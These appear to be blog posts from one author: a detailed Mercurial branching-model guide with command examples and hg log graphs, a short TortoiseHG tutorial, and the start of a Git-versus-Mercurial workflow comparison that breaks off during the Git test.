To visualize the structure, here’s a 3-tiered diagram. To the left are the actions of programmers (commits and feature branches) and in the center the tasks for maintainers (release and hotfix). The users to the right just use the stable branch.6

Overview Diagram
An overview of the branching strategy. Click the image to get the emacs org-mode ditaa-source.

Table of Contents

Practial Actions

Now we can look at all the actions you will ever need to do in this model:7

  • Regular development

    • commit changes: (edit); hg ci -m "message"

    • continue development after a release: hg update; (edit); hg ci -m "message"

  • Feature Branches

    • start a larger feature: hg branch feature-x; (edit); hg ci -m "message"

    • continue with the feature: hg update feature-x; (edit); hg ci -m "message"

    • merge the feature: hg update default; hg merge feature-x; hg ci -m "merged feature x into default"

    • close and merge the feature when you are done: hg update feature-x; hg ci --close-branch -m "finished feature x"; hg update default; hg merge feature-x; hg ci -m "merged finished feature x into default"

  • Tasks for Maintainers

    • Initialize (only needed once)

      • create the repo: hg init reponame; cd reponame

      • first commit: (edit); hg ci -m "message"

      • create the stable branch and do the first release: hg branch stable; hg tag tagname; hg up default; hg merge stable; hg ci -m "merge stable into default: ready for more development"

    • apply a hotfix8: hg up stable; (edit); hg ci -m "message"; hg up default; hg merge stable; hg ci -m "merge stable into default: ready for more development"

    • do a release9: hg up stable; hg merge default; hg ci -m "(description of the main changes since the last release)" ; hg tag tagname; hg up default ; hg merge stable ; hg ci -m "merged stable into default: ready for more development"

That’s it. All that follows are a detailed example which goes through all actions one-by-one, adaptions to this workflow and the final summary.

Example

This is the output of a complete example run 10 of the branching model, including all complications you should ever hit.

We start with the full history. In the following sections, we will take it apart to see what the commands do. So just take a glance, take in the basic structure and then move on for the details.

hg log -G
@    changeset:   15:855a230f416f
|\   tag:         tip
| |  parent:      13:e7f11bbc756c
| |  parent:      14:79b616e34057
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:49 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   14:79b616e34057
|/|  branch:      stable
| |  parent:      7:e8b509ebeaa9
| |  parent:      13:e7f11bbc756c
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:48 2013 +0100
| |  summary:     merged default into stable for release
| |
o |    changeset:   13:e7f11bbc756c
|\ \   parent:      11:e77a94df3bfe
| | |  parent:      12:aefc8b3a1df2
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:47 2013 +0100
| | |  summary:     merged finished feature x into default
| | |
| o |  changeset:   12:aefc8b3a1df2
| | |  branch:      feature-x
| | |  parent:      9:1dd6209b2a71
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:46 2013 +0100
| | |  summary:     finished feature x
| | |
o | |  changeset:   11:e77a94df3bfe
|\| |  parent:      10:8c423bc00eb6
| | |  parent:      9:1dd6209b2a71
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:45 2013 +0100
| | |  summary:     merged feature x into default
| | |
o | |  changeset:   10:8c423bc00eb6
| | |  parent:      8:dc61c2731eda
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Sat Jan 26 15:39:44 2013 +0100
| | |  summary:     3
| | |
| o |  changeset:   9:1dd6209b2a71
|/ /   branch:      feature-x
| |    user:        Arne Babenhauserheide <bab@draketo.de>
| |    date:        Sat Jan 26 15:39:43 2013 +0100
| |    summary:     x
| |
o |  changeset:   8:dc61c2731eda
|\|  parent:      5:4c57fdadfa26
| |  parent:      7:e8b509ebeaa9
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:43 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   7:e8b509ebeaa9
| |  branch:      stable
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:42 2013 +0100
| |  summary:     Added tag v2 for changeset 089fb0af2801
| |
| o  changeset:   6:089fb0af2801
|/|  branch:      stable
| |  tag:         v2
| |  parent:      4:d987ce9fc7c6
| |  parent:      5:4c57fdadfa26
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:41 2013 +0100
| |  summary:     merge default into stable for release
| |
o |  changeset:   5:4c57fdadfa26
|\|  parent:      3:bc625b0bf090
| |  parent:      4:d987ce9fc7c6
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:40 2013 +0100
| |  summary:     merge stable into default: ready for more development
| |
| o  changeset:   4:d987ce9fc7c6
| |  branch:      stable
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:39 2013 +0100
| |  summary:     hotfix
| |
o |  changeset:   3:bc625b0bf090
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     2
| |
o |  changeset:   2:3e8df435bcb0
|\|  parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   1:a8b7e0472c5b
|/   branch:      stable
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:36 2013 +0100
|    summary:     Added tag v1 for changeset f97ea6e468a1
|
o  changeset:   0:f97ea6e468a1
   tag:         v1
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Sat Jan 26 15:39:36 2013 +0100
   summary:     1

Action by action

Let’s take the log apart to show the actions contributors will do.

Initialize

Initializing and doing the first commit creates the first changeset:

o  changeset:   0:f97ea6e468a1
   tag:         v1
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Sat Jan 26 15:39:36 2013 +0100
   summary:     1

Nothing much to see here.

Commands:

hg init test-branch; cd test-branch
(edit); hg ci -m "message"

Stable branch and first release

We add the first tagging commit on the stable branch as release and merge back into default:

o    changeset:   2:3e8df435bcb0
|\   parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   1:a8b7e0472c5b
|/   branch:      stable
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:36 2013 +0100
|    summary:     Added tag v1 for changeset f97ea6e468a1
|
o  changeset:   0:f97ea6e468a1
   tag:         v1
   user:        Arne Babenhauserheide <bab@draketo.de>
   date:        Sat Jan 26 15:39:36 2013 +0100
   summary:     1

Mind the tag field which is now shown in changeset 0 and the branchname for changeset 1. This is the only release which will ever be on the default branch (because the stable branch only starts to exist after the first commit on it: The commit which adds the tag).

Commands:

hg branch stable
hg tag tagname
hg up default
hg merge stable
hg ci -m "merged stable into default: ready for more development"`

Further development

Now we just chuck along. The one commit shown here could be an arbitrary number of commits.

o    changeset:   3:bc625b0bf090
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:38 2013 +0100
|    summary:     2
|  
o    changeset:   2:3e8df435bcb0
|\   parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development

Commands:

(edit)
hg ci -m "message"

Hotfix

If a hotfix has to be applied to the release out of order, we just update to the stable branch, apply the hotfix and then merge the stable branch into default11. This gives us changesets 4 for the hotfix and 5 for the merge (2 and 3 are shown as reference).

o    changeset:   5:4c57fdadfa26
|\   parent:      3:bc625b0bf090
| |  parent:      4:d987ce9fc7c6
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:40 2013 +0100
| |  summary:     merge stable into default: ready for more development
| |
| o  changeset:   4:d987ce9fc7c6
| |  branch:      stable
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:39 2013 +0100
| |  summary:     hotfix
| |
o |  changeset:   3:bc625b0bf090
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     2
| |
o |  changeset:   2:3e8df435bcb0
|\|  parent:      0:f97ea6e468a1
| |  parent:      1:a8b7e0472c5b
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:38 2013 +0100
| |  summary:     merged stable into default: ready for more development

Commands:

hg up stable
(edit)
hg ci -m "message"
hg up default
hg merge stable
hg ci -m "merge stable into default: ready for more development"    

Regular release

To do a regular release, we just merge the default branch into the stable branch and tag the merge. Then we merge stable back into default. This gives us changesets 6 to 812. The commit-message you use for the merge to stable will become the description for your tag, so you should choose a good description instead of “merge default into stable for release”. Userfriendly, simplified release notes would be a good choice.

o    changeset:   8:dc61c2731eda
|\   parent:      5:4c57fdadfa26
| |  parent:      7:e8b509ebeaa9
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:43 2013 +0100
| |  summary:     merged stable into default: ready for more development
| |
| o  changeset:   7:e8b509ebeaa9
| |  branch:      stable
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:42 2013 +0100
| |  summary:     Added tag v2 for changeset 089fb0af2801
| |
| o  changeset:   6:089fb0af2801
|/|  branch:      stable
| |  tag:         v2
| |  parent:      4:d987ce9fc7c6
| |  parent:      5:4c57fdadfa26
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:41 2013 +0100
| |  summary:     merge default into stable for release
| |
o |  changeset:   5:4c57fdadfa26
|\|  parent:      3:bc625b0bf090
| |  parent:      4:d987ce9fc7c6
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:40 2013 +0100
| |  summary:     merge stable into default: ready for more development

Commands:

hg up stable
hg merge default
hg ci -m "merge default into stable for release"
hg tag tagname
hg up default
hg merge stable
hg ci -m "merged stable into default: ready for more development"

Feature branches

Now we want to do some larger development, so we use a feature branch. The one feature-commit shown here (x) could be an arbitrary number of commits, and as long as you stay in your branch, the development of your colleagues will not disturb your own work. Once the feature is finished, we merge it into default. The feature branch gives us changesets 9 to 13 (with 10 being an example for an unrelated intermediate commit on default).

o    changeset:   13:e7f11bbc756c
|\   parent:      11:e77a94df3bfe
| |  parent:      12:aefc8b3a1df2
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:47 2013 +0100
| |  summary:     merged finished feature x into default
| |
| o  changeset:   12:aefc8b3a1df2
| |  branch:      feature-x
| |  parent:      9:1dd6209b2a71
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:46 2013 +0100
| |  summary:     finished feature x
| |
o |  changeset:   11:e77a94df3bfe
|\|  parent:      10:8c423bc00eb6
| |  parent:      9:1dd6209b2a71
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:45 2013 +0100
| |  summary:     merged feature x into default
| |
o |  changeset:   10:8c423bc00eb6
| |  parent:      8:dc61c2731eda
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:44 2013 +0100
| |  summary:     3
| |
| o  changeset:   9:1dd6209b2a71
|/   branch:      feature-x
|    user:        Arne Babenhauserheide <bab@draketo.de>
|    date:        Sat Jan 26 15:39:43 2013 +0100
|    summary:     x
|  
o    changeset:   8:dc61c2731eda
|\   parent:      5:4c57fdadfa26
| |  parent:      7:e8b509ebeaa9
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Sat Jan 26 15:39:43 2013 +0100
| |  summary:     merged stable into default: ready for more development

Commands:

  • Start the feature

    hg branch feature-x 
    (edit)
    hg ci -m "message"
    
  • Do an intermediate commit on default

    hg update default
    (edit)
    hg ci -m "message"
    
  • Continue working on the feature

    hg update feature-x
    (edit)
    hg ci -m "message"
    
  • Merge the feature

    hg update default
    hg merge feature-x
    hg ci -m "merged feature x into default"`
    
  • Close and merge a finished feature

    hg update feature-x
    hg ci --close-branch -m "finished feature x"
    hg update default; hg merge feature-x
    hg ci -m "merged finished feature x into default"
    

Note: Closing the feature branch hides that branch in the output of hg branches (except when using --closed) to make the repository state lean and simple while still keeping the feature branch information in history. It shows your collegues, that they no longer have to keep the feature in mind as soon as they merge the most recent changes from the default branch into their own feature branches.

Note: To make the final merge of your feature into default easier, you can regularly merge the default branch into the feature branch.

Note: We use feature branches to ensure that new clones start at a revision which other developers can directly use. With bookmarks you could get trapped on a feature-head which might not be merged to default for quite some time. For more reasons, see the bookmarks footnote.

The final action is to have a maintainer do a regular merge of default into stable to reach a state from which we could safely do a release. Since we already showed how to do that, we are finished here.

Adaptions

This realizes the successful Git branching model13 with Mercurial while maintaining one release at any given time.

If you have special needs, this model can easily be extended to fullfill your requirements. Useful extensions include:

  • multiple releases - if you need to provide maintenance for multiple releases side-by-side.
  • grafted micro-releases - if you need to segment the next big changes into smaller releases while leaving out some potentially risky changes.
  • explicit review - if you want to ensure that only reviewed changes can get into a release, while making it possible to leave out some already reviewed changes from the next releases. Review gets decoupled from releasing.

All these extensions are orthogonal, so you can use them together without getting side-effects.

Multiple maintained releases

To use the branching model with multiple simultaneously maintained releases, you only need to change the hotfix procedure: When applying a hotfix, you go back to the old release with hg update tagname, fix there, add a new tag for the fixed release and then update to the next release. There you merge the new fix-release and do the same for all other releases. If the most recent release is not the head of the stable branch, you also merge into stable. Then you merge the stable branch into default, as for a normal hotfix.14

With this merge-chain you don’t need special branches for releases, but all changesets are still clearly recorded. This simplification over git is a direct result of having real anonymous branching in Mercurial.

hg update release-1.0
(edit)
hg ci -m "message"
hg tag release-1.1
hg update release-2.0
hg merge release-1.1
hg ci -m "merged changes from release 1.1"
hg tag release-2.1
… and so on

In the Diagram this just adds a merge path from the hotfix to the still maintained releases. Note that nothing changed in the workflow of programmers.

Overview Diagram
An overview of the branching strategy with maintained releases. Click the image to get the emacs org-mode ditaa-source.

Graft changes into micro-releases

If you need to test parts of the current development in small chunks, you can graft micro releases. In that case, just update to stable and merge the first revision from default, whose child you do not want, and graft later changes15.

Example for the first time you use micro-releases16:

You have changes 1, 2, 3, 4 and 5 on default. First you want to create a release which contains 1 and 4, but not 2, 3 or 5.

hg update 1
hg branch stable
hg graft 4

As usual tag the release and merge stable back into default:

hg tag rel-14 
hg update default
hg merge stable
hg commit -m "merge stable into default. ready for more development"

Example for the second and subsequent releases:

Now you want to release the change 2 and 5, but you’re still not ready to release 3. So you merge 2 and graft 5.

hg update stable
hg merge 2
hg commit -m "merge all changes until 2 from default"
hg graft 5

As usual tag the release and finally merge stable back into default:

hg tag rel-1245 
hg update default
hg merge stable
hg commit -m "merge stable into default. ready for more development"

The history now looks like this17:

@    merge stable into default. ready for more development (default)
|\
| o  Added tag rel-1245 for changeset 4e889731c6ca (stable)
| |
| o  5 (stable)
| |
| o    merge all changes until 2 from default (stable)
| |\
o---+  merge stable into default. ready for more development (default)
| | |
| | o  Added tag rel-14 for changeset cc2c95dd3f27 (stable)
| | |
| | o  4 (stable)
| | |
o | |  5 (default)
| | |
o | |  4 (default)
| | |
o | |  3 (default)
|/ /
o /  2 (default)
|/
o  1 (default)
|
o  0 (default)

In the Diagram this just adds graft commits to stable:

Overview Diagram
An overview of the branching strategy with grafted micro-releases. Click the image to get the emacs org-mode ditaa-source.

Grafted micro-releases add another layer between development and releases. They can be necessary in cases where testing requires actually deploying a release, as for example in Freenet.

Explicit review branch

If you want to add a separate review stage, you can use a review branch1819 into which you only merge or graft reviewed changes. The review branch then acts as a staging area for all changes which might go into a release.

To use this extension of the branching model, just create a branch on default called review in which you merge or graft reviewed changes. The first time you do that, you update to the first commit whose children you do not want to include. Then create the review branch with hg branch review and use hg graft REV to pull in all changes you want to include.

On subsequent reviews, you just update to review with hg update nextrelease, merge the first revision which has a child you do not want with hg merge REV and graft additional later changes with hg graft REV as you would do it for micro-releases..

In both cases you create the release by merging the review branch into stable.

A special condition when using a review branch is that you always have to merge hotfixes into the review branch, too, because the review branch does not automatically contain all changes from the default branch.

In the Diagram this just adds the review branch between default and stable instead of the release merge. Also it adds the hotfix merge to the review branch.

Overview Diagram
An overview of the branching strategy with a review branch. Click the image to get the emacs org-mode ditaa-source.

Frequently Asked Questions (FAQ)

Where does QA (Quality Assurance) come in?

In the default flow when the users directly use the stable branch you do QA on the default branch before merging to stable. QA is a part of the maintainers job, there.

If your users want external QA, that QA is done for revisions on the stable branch. It is restricted to signing good revisions. Any changes have to be done on the default branch - except for hotfixes for previously signed releases. It is only a hotfix, if your users could already be running a broken version.

There is also an extension with an explicit review branch. There QA is done on the review branch.

Simple Summary

This realizes the successful Git branching model with Mercurial.

We now have nice graphs, examples, potential extensions and so on. But since this strategy uses Mercurial instead of git, we don’t actually need all the graphics, descriptions and branch categories in the git version - or in this post.

Instead we can boil all of this down to 3 simple rules:

(1) you do all the work on default - except for hotfixes.

(2) on stable you only do hotfixes, merges for release and tagging for release. Only maintainers touch stable.

(3) you can use arbitrary feature-branches, as long as you don’t call them default or stable. They always start at default (since you do all the work on default).

They are the rules you already know from the starting summary. Keep them in mind and you’re good to go. And when you’re doing regular development, there is only one rule to remember:

You do all the work on default.

That’s it. Happy hacking!


  1. if you need to maintain multiple very different releases simultanously, see or 20 for adaptions 

  2. default is the default branch. That’s the named branch you use when you don’t explicitely set a branch. Its alias is the empty string, so if no branch is shown in the log (hg log), you’re on the default branch. Thanks to John for asking! 

  3. If you want to release the changes from default in smaller chunks, you can also graft specific changes into a release preparation branch and merge that instead of directly merging default into stable. This can be useful to get real-life testing of the distinct parts. For details see the extension Graft changes into micro-releases

  4. Maintainers are those who do releases, while they do a release. At any other time, they follow the same patterns as everyone else. If the release tasks seem a bit long, keep in mind that you only need them when you do the release. Their goal is to make regular development as easy as possible, so you can tell your non-releasing colleagues “just work on default and everything will be fine”. 

  5. This model does not use bookmarks, because they don’t offer benefits which outweight the cost of introducing another concept: If you use bookmarks for differenciating lines of development, you have to define the canonical revision to clone by setting the @ bookmark. For local work and small features, bookmarks can be used quite well, though, and since this model does not define their use, it also does not limit it.
    Additionally bookmarks could be useful for feature branches, if you use many of them (in that case reusing names is a real danger and not just a rare annoyance) or if you use release branches:
    “What are people working on right now?” → hg bookmarks
    “Which lines of development do we have in the project?” → hg branches 

  6. Those users who want external verification can restrict themselves to the tagged releases - potentially GPG signed by trusted 3rd-party reviewers. GPG signatures are treated like hotfixes: reviewers sign on stable (via hg sign without options) and merge into default. Signing directly on stable reduces the possibility of signing the wrong revision. 

  7. hg pull and hg push to transfer changes and hg merge when you have multiple heads on one branch are implied in the actions: you can use any kind of repository structure and synchronization scheme. The practical actions only assume that you synchronize your repositories with the other contributors at some point. 

  8. Here a hotfix is defined as a fix which must be applied quickly out-of-order, for example to fix a security hole. It prompts a bugfix-release which only contains already stable and tested changes plus the hotfix. 

  9. If your project needs a certain release preparation phase (like translations), then you can simply assign a task branch. Instead of merging to stable, you merge to the task branch, and once the task is done, you merge the task branch to stable. An Example: Assume that you need to update translations before you release anything. (next part: init: you only need this once) When you want to do the first release which needs to be translated, you update to the revision from which you want to make the release and create the “translation” branch: hg update default; hg branch translation; hg commit -m "prepared the translation branch". All translators now update to the translation branch and do the translations. Then you merge it into stable: hg update stable; hg merge translation; hg ci -m "merged translated source for release". After the release you merge stable back into default as usual. (regular releases) If you want to start translating the next time, you just merge the revision to release into the translation branch: hg update translation; hg merge default; hg commit -m "prepared translation branch". Afterwards you merge “translation” into stable and proceed as usual. 

  10. To run the example and check the output yourself, just copy-paste the following your shell: LC_ALL=C sh -c 'hg init test-branch; cd test-branch; echo 1 > 1; hg ci -Am 1; hg branch stable; hg tag v1 ; hg up default; hg merge stable; hg ci -m "merged stable into default: ready for more development"; echo 2 > 2; hg ci -Am 2; hg up stable; echo 1.1 > 1; hg ci -Am hotfix; hg up default; hg merge stable; hg ci -m "merge stable into default: ready for more development"; hg up stable; hg merge default; hg ci -m "merge default into stable for release" ; hg tag v2; hg up default ; hg merge stable ; hg ci -m "merged stable into default: ready for more development" ; hg branch feature-x; echo x > x ; hg ci -Am x; hg up default; echo 3 > 3; hg ci -Am 3; hg merge feature-x; hg ci -m "merged feature x into default"; hg update feature-x; hg ci --close-branch -m "finished feature x"; hg update default; hg merge feature-x; hg ci -m "merged finished feature x into default"; hg up stable ; hg merge default; hg ci -m "merged default into stable for release"; hg up default; hg merge stable ; hg ci -m "merged stable into default: ready for more development"; hg log -G' 

  11. We merge the hotfix into default to define the relevance of the fix for general development. If the hotfix also affects the current line of development, we keep its changes in the merge. If the current line of development does not need the hotfix, we discard its changes in the merge. We do this to ensure that it is clear in future how to treat the hotfix when merging new changes: let the merge record the decision. 

  12. We can also merge to stable regularly as soon as some set of changes is considered stable, but without making an actual release (==tagging). That way we always have a stable branch which people can test without having to create releases right away. The releases are those changesets on the stable branch which carry a tag. 

  13. If you look at the Git branching model which inspired this Mercurial branching model, you’ll note that its diagram is a lot more complex than the diagram of this Mercurial version.

    The reason for that is the more expressive history model of Mercurial. In short: The git version has 5 types of branches: feature, develop, release, hotfix and master (for tagging). With Mercurial you can reduce them to 3: default, stable and feature branches:

    • Tags are simple in-history objets, so we need no special branch for them: a tag signifies a release (down to 4 branch-types - and no more duplication of information, since in the git-model a release is shown by a tag and a merge to master).
    • Hotfixes are simple commits on stable followed by a merge to default, so we also need no branch for them (down to 3 branch-types). And if we only maintain one release at a time, we only need one branch for them: stable (down from branch-type to single branch).
    • And feature branches are not required for clean separation since mercurial can easily cope with multiple heads in a branch, so developers only have to worry about them if they want to use them (down to 2 mandatory branches).
    • And since the default branch is the branch to which you update automatically when you clone a repository, new developers don’t have to worry about branches at all.

    So we get down from 5 mandatory branches (2 of them are categories containing multiple branches) to 2 simple branches without losing functionality.

    And new developers only need to know two things about our branching model to contribute:

    “If you use feature branches, don’t call them default or stable. And don’t touch stable”.

  14. Merging old releases into new ones sounds like a lot of work. If you get that feeling, then have a look how many releases you really maintain right now. In my Gentoo tree most programs actually have only one single release, so using actual release branches would incur an additional burden without adding real value. You can also look at the rule of thumb whether to choose feature branches instead 

  15. If you want to make sure that every changeset on stable is production-ready, you can also start a new release-branch on stable, then merge the first revision, whose child you do not want, into that branch and graft additional changes. Then close the branch and merge it into stable. You can achieve the same with much lower overhead (unneeded complexity) by changing the requirement to “every tagged revision on stable is production-ready”. To only see tagged revisions on stable, just use hg log -r "branch(stable) and tag()". This also works for incoming and outgoing, so you can use it for triggering a build system. 

  16. To test this workflow yourself, just create the test repository with hg init 12345; cd 12345; for i in {0..5}; do echo $i > $i; hg ci -Am $i; done

  17. The short graphlog for the grafted micro-releases was created via hg glog --template "{desc} ({branch})"

  18. The review branch is a special preparation-branch, because it can get discontinous changes, if maintainers decide to graft some changes which have ancestors they did not review yet. 

  19. We use one single review branch which gets reused at every review to ensure that there are no changes in stable which we did not have in the review. As alternative, you could use one branch per review. In that case, ensure that you start the review-* branches from stable and not from default. Then merge and graft the changes from default which you want to review for inclusion in your next release. 

  20. If you want to adapt the model to multiple very distinct releases, simply add multiple release-branches (i.e. release-x). Then hg graft the changes you want to use from default or stable into the releases and merge the releases into stable to ensure that the relationship of their changes to current changes is clear, recorded and will be applied automatically by Mercurial in future merges21. If you use multiple tagged releases, you need to merge the releases into each other in order - starting from the oldest and finishing by merging the most recent one into stable - to record the same information as with release branches. Additionally it is considered impolite to other developers to keep multiple heads in one branch, because with multiple heads other developers do not know the canonical tip of the branch which they should use to make their changes - or in case of stable, which head they should merge to for preparing the next release. That’s why you are likely better off creating a branch per release, if you want to maintain many very different releases for a long time. If you only use tags on stable for releases, you need one merge per maintained release to create a bugfix version of one old release. By adding release branches, you reduce that overhead to one single merge to stable per affected release by stating clearly, that changes to old versions should never affect new versions, except if those changes are explicitely merged into the new versions. If the bugfix affects all releases, release branches require two times as many actions as tagged releases, though: You need to graft the bugfix into every release and merge the release into stable.22 

  21. If for example you want to ignore that change to an old release for new releases, you simply merge the old release into stable and use hg revert --all -r stable before committing the merge. 

  22. A rule of thumb for deciding between tagged releases and release branches is: If you only have a few releases you maintain at the same time, use tagged releases. If you expect that most bugfixes will apply to all releases, starting with some old release, just use tagged releases. If bugfixes will only apply to one release and the current development, use tagged releases and merge hotfixes only to stable. If most bugfixes will only apply to one release and not to the current development, use release branches. 

AnhangGröße
hgbranchingoverview.png28.75 KB
hgbranchinggraft.png29.36 KB
hgbranchingreview.png35.6 KB
2012-09-03-Mo-hg-branching-diagrams.org12.43 KB
hgbranchingmaintain.png45.08 KB
2012-09-03-Mo-hg-branching-diagrams.org10.74 KB

A short introduction to Mercurial with TortoiseHG (GNU/Linux and Windows)

Note: This tutorial is for the old TortoiseHG (with gtk interface). The new one works a bit differently (and uses Qt). See the official quick start guide. The right-click menus should still work similar to the ones described here, though.

Downloading the Repository

After installing TortoiseHG, you can download a repository to your computer by right-clicking in a folder and selecting the menu "TortoiseHG" and then "Clone" in there (currently you still need Windows for that - all other dialogs can be evoked in GNU/Linux on the commandline via "hgtk").

Right-Click menu, Windows:

Right-click-Menu

Create Clone, GNU/Linux:

Create Clone

In the dialog you just enter the url of the repository, for example:

http://www.bitbucket.org/ArneBab/md-esw-2009

(that's also the address of the repository in the internet - just try clicking the link.

When you log in to bitbucket.org you will find a clone-address directly on the site. You can also use that clone address to upload changes (it contains your login-name, and I can give you "push" access on that site).

Workflow with TortoiseHG

This gives you two basic abilities:

  • Save and view changes locally, and
  • synchronize changes with others.

(I assume that part of what I say is redundant, but I'd rather write a bit too much than omit a crucial bit)

To save changes, you can simlply select "HG Commit" in the right-click-menu. If some of your files aren't known to HG yet (the box before the file isn't ticked), you have to add them (tick the box) to be able to commit them.

Commit

To go back to earlier changes, you can use "Checkout Revision" in the "TortoiseHG" menu. In that dialog you can then select the revision you want to see and use the icon on the upper left to get all files to that revision.

Update

Update-Result

You can synchronize by right-clicking in the folder and selecting "Synchronize" in the "TortoiseHG" menu (inside the right-click menu). In the opening dialog you can "push" (upload changes - arrow up with the bar above it), "pull" (download changes to your computer - arrow down with bar below), and check what you would pull or push (arrows iwthout bars). I thing that using dialog will soon became second nature for you, too :)

Synchronize

Pull

Have fun with TortoiseHG! :) - Arne

PS: There's also a longer intro to TortoiseHG and an overview to DVCS.

PPS: md-esw-2009 is a repository in which Baddok and I planned a dual-gm roleplaying session Mechanical Dream.

PPPS: There's also a german version of this article on my german pages.

Basic usecases for DVCS: Workflow Failures

If you came here searching for a way to set the username in Mercurial: just run hg config --edit and add
    [ui]
    username = YOURNAME <EMAIL>
to the file which gets opened. If you have a very old version of Mercurial (<3.0), open $HOME/.hgrc manually.

Update (2015-02-05): For the Git breakage there is now a partial solution in Git v2.3.0: You can push into a checked out branch when you prepare the target repo via git config receive.denyCurrentBranch updateInstead, but only if nothing was changed there. This does not fully address the workflow breakage (the success of the operation is still state-dependent), but at least it makes it work. With Git providing a partial solution for the breakage I reported and Mercurial providing a full solution since 2014-05-01, I call this blog post a success. Thank you Git and Mercurial devs!

Update (2014-05-01): The Mercurial breakage is fixed in Mercurial 3.0: When you commit without username it now says “Abort: no username supplied (use "hg config --edit" to set your username)”. The editor shows a template with a commented-out field for the username. Just put your name and email after the pre-filled username = and save the file. The Git breakage still exists.

Update (2013-04-18): In #mercurial @ irc.freenode.net there were discussions yesterday for improving the help output if you do not have your username setup, yet.

1 Intro

I recently tried contributing to a new project again, and I was quite surprised which hurdles can be in your way, when you did not setup your environment, yet.

So I decided to put together a small test for the basic workflow: Cloning a project, doing and testing a change and pushing it back.

I did that for Git and Mercurial, because both break at different points.

I’ll express the basic usecase in Subversion:

  • svn checkout [project]
  • (hack, test, repeat)
  • (request commit rights)
  • svn commit -m "added X"

You can also replace the request for commit rights with creating a patch and sending it to a mailing list. But let’s take the easiest case of a new contributor who is directly welcomed into the project as trusted committer.

dvcs-basic-svn.png

A slightly more advanced workflow adds testing in a clean tree. In Subversion it looks almost like the simple commit:

dvcs-basic-svn-testing.png

2Git

Let’s start with Linus’ DVCS. And since we’re using a DVCS, let’s also try it out in real life

2.1 Setup the test

LC_ALL=C
LANG=C
PS1="$"
rm -rf /tmp/gitflow > /dev/null
mkdir -p /tmp/gitflow > /dev/null
cd /tmp/gitflow > /dev/null
# init the repo
git init orig  > /dev/null
cd orig > /dev/null
echo 1 > 1
# add a commit
git add 1 > /dev/null
git config user.name upstream > /dev/null
git config user.email up@stream > /dev/null
git commit -m 1 > /dev/null
# checkout another branch but master. YES, YOU SHOULD DO THAT on the shared repo. We’ll see later, why.
git checkout -b never-pull-this-temporary-useless-branch master 2> /dev/null
cd .. > /dev/null
echo # purely cosmetic and implementation detail: this adds a new line to the output
ls
wolf, n.:
    A man who knows all the ankles.
arne@fluss ~/.emacs.d/private/journal $ arne@fluss ~/.emacs.d/private/journal $ $$$$$$$$$$$$$$$$
orig
git --version

git version 1.8.1.5

2.2 Simplest case

2.2.1 Get the repo

First I get the repo

git clone orig mine
echo $ ls
ls
Cloning into 'mine'...
done.
$ ls
mine  orig

2.2.2 Hack a bit

cd mine
echo 2 > 1
git commit -m "hack"

$# On branch master
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git checkout -- <file>..." to discard changes in working directory)

modified:   1
no changes added to commit (use "git add" and/or "git commit -a")

ARGL… but let’s paste the commands into the shell. I do not use –global, since I do not want to shoot my test environment here.

git config user.name "contributor"
git config user.email "con@tribut.or"

and try again

git commit -m "hack"

On branch master
Changes not staged for commit:
